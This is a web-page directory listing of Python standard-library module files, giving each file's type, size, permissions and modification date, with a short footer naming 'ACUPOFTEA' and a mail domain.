text/x-python
10.42 KB
-rw-r--r--
2018-12-23 09:37:14
inspect.py
text/x-python
114.22 KB
-rw-r--r--
2018-12-23 09:37:14
io.py
text/x-python
3.43 KB
-rw-r--r--
2018-12-23 09:37:14
ipaddress.py
text/x-python
75.99 KB
-rw-r--r--
2025-08-26 08:58:55
keyword.py
text/plain
2.17 KB
-rwxr-xr-x
2018-12-23 09:37:14
linecache.py
text/plain
5.19 KB
-rw-r--r--
2018-12-23 09:37:14
locale.py
text/x-python
75.49 KB
-rw-r--r--
2018-12-23 09:37:14
lzma.py
text/x-python
12.68 KB
-rw-r--r--
2018-12-23 09:37:14
macpath.py
text/x-python
5.83 KB
-rw-r--r--
2018-12-23 09:37:14
macurl2path.py
text/plain
2.67 KB
-rw-r--r--
2018-12-23 09:37:14
mailbox.py
text/plain
76.78 KB
-rw-r--r--
2018-12-23 09:37:14
mailcap.py
text/plain
8.85 KB
-rw-r--r--
2025-08-26 08:58:55
mimetypes.py
text/plain
20.55 KB
-rw-r--r--
2018-12-23 09:37:14
modulefinder.py
text/plain
22.49 KB
-rw-r--r--
2018-12-23 09:37:14
netrc.py
text/plain
5.55 KB
-rw-r--r--
2018-12-23 09:37:14
nntplib.py
text/x-python
42.07 KB
-rw-r--r--
2018-12-23 09:37:14
ntpath.py
text/x-python
22.55 KB
-rw-r--r--
2018-12-23 09:37:14
nturl2path.py
text/plain
2.39 KB
-rw-r--r--
2018-12-23 09:37:14
numbers.py
text/x-python
10 KB
-rw-r--r--
2018-12-23 09:37:14
opcode.py
text/x-python
5.69 KB
-rw-r--r--
2018-12-23 09:37:14
operator.py
text/x-python
10.61 KB
-rw-r--r--
2018-12-23 09:37:14
optparse.py
text/plain
58.96 KB
-rw-r--r--
2018-12-23 09:37:14
os.py
text/x-python
36.65 KB
-rw-r--r--
2018-12-23 09:37:14
pathlib.py
text/x-python
45.15 KB
-rw-r--r--
2025-08-26 08:58:55
pdb.py
text/plain
59.88 KB
-rwxr-xr-x
2018-12-23 09:37:14
pickle.py
text/x-python
54.39 KB
-rw-r--r--
2018-12-23 09:37:14
pickletools.py
text/troff
89.62 KB
-rw-r--r--
2018-12-23 09:37:14
pipes.py
text/x-python
8.71 KB
-rw-r--r--
2018-12-23 09:37:14
pkgutil.py
text/x-python
20.82 KB
-rw-r--r--
2018-12-23 09:37:14
platform.py
text/plain
46.11 KB
-rwxr-xr-x
2025-08-26 08:58:55
plistlib.py
text/x-python
31.53 KB
-rw-r--r--
2025-08-26 08:58:55
poplib.py
text/plain
14.61 KB
-rw-r--r--
2018-12-23 09:37:14
posixpath.py
text/x-python
15.94 KB
-rw-r--r--
2025-08-26 08:58:55
pprint.py
text/x-python
20.37 KB
-rw-r--r--
2018-12-23 09:37:14
profile.py
text/plain
21.51 KB
-rwxr-xr-x
2018-12-23 09:37:14
pstats.py
text/x-python
25.94 KB
-rw-r--r--
2018-12-23 09:37:14
pty.py
text/x-python
4.65 KB
-rw-r--r--
2018-12-23 09:37:14
py_compile.py
text/plain
7.01 KB
-rw-r--r--
2018-12-23 09:37:14
pyclbr.py
text/x-python
13.24 KB
-rw-r--r--
2018-12-23 09:37:14
pydoc.py
text/x-python
101.08 KB
-rw-r--r--
2025-08-26 09:08:09
queue.py
text/x-python
8.57 KB
-rw-r--r--
2018-12-23 09:37:14
quopri.py
text/plain
7.09 KB
-rwxr-xr-x
2018-12-23 09:37:14
random.py
text/x-python
26.8 KB
-rw-r--r--
2018-12-23 09:37:14
re.py
text/x-python
15.19 KB
-rw-r--r--
2018-12-23 09:37:14
reprlib.py
text/x-python
5.21 KB
-rw-r--r--
2018-12-23 09:37:14
rlcompleter.py
text/plain
6.93 KB
-rw-r--r--
2018-12-23 09:37:14
runpy.py
text/x-python
11.68 KB
-rw-r--r--
2018-12-23 09:37:14
sched.py
text/x-python
6.36 KB
-rw-r--r--
2018-12-23 09:37:14
secrets.py
text/x-python
1.99 KB
-rw-r--r--
2018-12-23 09:37:14
selectors.py
text/x-python
18.98 KB
-rw-r--r--
2018-12-23 09:37:14
shelve.py
text/x-python
8.32 KB
-rw-r--r--
2018-12-23 09:37:14
shlex.py
text/x-python
12.65 KB
-rw-r--r--
2018-12-23 09:37:14
shutil.py
text/plain
39.87 KB
-rw-r--r--
2025-08-26 08:58:55
signal.py
text/x-python
2.07 KB
-rw-r--r--
2018-12-23 09:37:14
site.py
text/plain
20.77 KB
-rw-r--r--
2025-08-26 08:58:55
smtpd.py
text/plain
33.91 KB
-rwxr-xr-x
2018-12-23 09:37:14
smtplib.py
text/plain
43.18 KB
-rwxr-xr-x
2018-12-23 09:37:14
sndhdr.py
text/x-python
6.92 KB
-rw-r--r--
2018-12-23 09:37:14
socket.py
text/x-python
26.8 KB
-rw-r--r--
2018-12-23 09:37:14
socketserver.py
text/x-python
26.38 KB
-rw-r--r--
2018-12-23 09:37:14
sre_compile.py
text/x-python
18.88 KB
-rw-r--r--
2018-12-23 09:37:14
sre_constants.py
text/x-python
6.66 KB
-rw-r--r--
2018-12-23 09:37:14
sre_parse.py
text/x-python
35.68 KB
-rw-r--r--
2018-12-23 09:37:14
ssl.py
text/x-python
43.47 KB
-rw-r--r--
2025-08-26 08:58:55
stat.py
text/plain
4.92 KB
-rw-r--r--
2018-12-23 09:37:14
statistics.py
text/x-python
20.19 KB
-rw-r--r--
2018-12-23 09:37:14
string.py
text/x-python
11.52 KB
-rw-r--r--
2018-12-23 09:37:14
stringprep.py
text/x-python
12.61 KB
-rw-r--r--
2018-12-23 09:37:14
struct.py
text/x-python
257 B
-rw-r--r--
2018-12-23 09:37:14
subprocess.py
text/x-python
60.88 KB
-rw-r--r--
2018-12-23 09:37:14
sunau.py
text/x-python
17.67 KB
-rw-r--r--
2018-12-23 09:37:14
symbol.py
text/plain
2.07 KB
-rwxr-xr-x
2018-12-23 09:37:14
symtable.py
text/x-python
7.11 KB
-rw-r--r--
2018-12-23 09:37:14
sysconfig.py
text/x-python
24.29 KB
-rw-r--r--
2025-08-26 09:08:08
tabnanny.py
text/plain
11.14 KB
-rwxr-xr-x
2018-12-23 09:37:14
tarfile.py
text/plain
109.02 KB
-rwxr-xr-x
2025-08-26 08:58:55
telnetlib.py
text/x-python
22.59 KB
-rw-r--r--
2018-12-23 09:37:14
tempfile.py
text/x-python
27.41 KB
-rw-r--r--
2025-08-26 08:58:55
textwrap.py
text/plain
19.1 KB
-rw-r--r--
2018-12-23 09:37:14
this.py
text/plain
1003 B
-rw-r--r--
2018-12-23 09:37:14
threading.py
text/x-python
48.96 KB
-rw-r--r--
2025-08-26 08:58:55
timeit.py
text/plain
13.03 KB
-rwxr-xr-x
2018-12-23 09:37:14
token.py
text/plain
3 KB
-rw-r--r--
2018-12-23 09:37:14
tokenize.py
text/x-python
28.8 KB
-rw-r--r--
2018-12-23 09:37:14
trace.py
text/plain
28.06 KB
-rwxr-xr-x
2018-12-23 09:37:14
traceback.py
text/plain
22.91 KB
-rw-r--r--
2018-12-23 09:37:14
tracemalloc.py
text/x-python
16.27 KB
-rw-r--r--
2018-12-23 09:37:14
tty.py
text/x-python
879 B
-rw-r--r--
2018-12-23 09:37:14
types.py
text/plain
8.66 KB
-rw-r--r--
2018-12-23 09:37:14
typing.py
text/x-python
78.39 KB
-rw-r--r--
2018-12-23 09:37:14
uu.py
text/plain
6.6 KB
-rwxr-xr-x
2018-12-23 09:37:14
uuid.py
text/x-c++
23.46 KB
-rw-r--r--
2025-08-26 08:58:55
warnings.py
text/plain
18.05 KB
-rw-r--r--
2018-12-23 09:37:14
wave.py
text/x-python
17.29 KB
-rw-r--r--
2018-12-23 09:37:14
weakref.py
text/x-python
19.99 KB
-rw-r--r--
2018-12-23 09:37:14
webbrowser.py
text/plain
21.26 KB
-rwxr-xr-x
2018-12-23 09:37:14
xdrlib.py
text/x-python
5.77 KB
-rw-r--r--
2018-12-23 09:37:14
zipapp.py
text/x-python
6.99 KB
-rw-r--r--
2018-12-23 09:37:14
zipfile.py
text/plain
78.05 KB
-rw-r--r--
2025-08-26 08:58:55
~ ACUPOFTEA - mail.ontime-ae.com